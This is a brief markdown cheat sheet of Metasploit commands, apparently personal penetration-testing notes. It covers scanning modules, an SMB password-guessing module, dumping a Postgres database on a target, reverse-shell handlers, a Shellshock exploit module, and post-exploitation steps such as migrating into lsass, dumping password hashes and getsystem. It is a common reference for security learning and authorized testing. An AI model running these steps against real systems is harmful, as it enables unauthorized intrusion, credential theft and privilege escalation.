# Metasploit

## Modules
* __Auxiliary__ scanners, crawlers and fuzzers
* __Encoders__ encode payloads
* __Evasion__ prepare payloads to circumvent signature based malware detection 
* __NOPs__ various architectures
* __Payloads__ to run on target systems
    * Singles, inline payloads, for example generic/shell_reverse_tcp
    * Stagers, downloads the stages payloads
    * Stages, for example windows/x64/shell/reverse_tcp
* __Post__ postexploitation

## Notes        

* Search via scope 
```sh
search type:auxiliary <stuff>
```
* Send exploit to background
```
run -z
```
* `check` if target is vulnerable
* `setg` sets variables globally
* `unset payload`
* Flush via `unset all`

## Sessions

* `background` or `ctrl+z`
* Foreground via `sessions -i <number>`

## Scanning

* Portscan
```sh
search portscan
```
* UDP Sweep via `scanner/discovery/udp_sweep`
* SMB Scan via `scanner/smb/smb_version` and `smb_enumshares`
* SMB login dictionary attack `scanner/smb/smb_login`
* NetBios via `scanner/netbios/nbname`
* HTTP version `scanner/http/http_version`

## Database

* Start postgres
* `msfdb init`
* `db_status`
* Separate `workspace -a <projectname>`
* Safe scans via `db_nmap`
* Show `hosts`
* Show `services`
* Set RHOST values via `hosts -R`

### Database Operations

* Dump schemas
```sh
use auxiliary/scanner/postgres_schemadump
run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres 
```

* Select table
```sh
use auxiliary/admin/postgres/postgres_sql
run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres sql='select * from users'
```

## Exploits

* `show targets`
* `show payloads`

## Reverse Shells

* Multihandler, set options
```sh
use exploit/multi/handler
set payload <payloadhandler>
```
* Shellshock as an example
```sh
use multi/http/apache_mod_cgi_bash_env_exec
```

## Post Exploitation

* `load kiwi`
* `load python`
* Windows
    * list SAM database
    ```sh
    migrate <lsass.exe-PID>
    hashdump
    ```
    * enum shares
    ```sh
    post/windows/gather/enum_shares
    ```
* Linux
    * `use post/linux/gather/hashdump`

## Other Meterpreter stuff

* Staged and in disguise running as another servicename
```
getpid
ps
``` 
* Attempt to elevate privileges
```sh
getsystem
```
* Use `multi/handler` or exploit and get an overview via `show payloads`
* UserID via `getuid`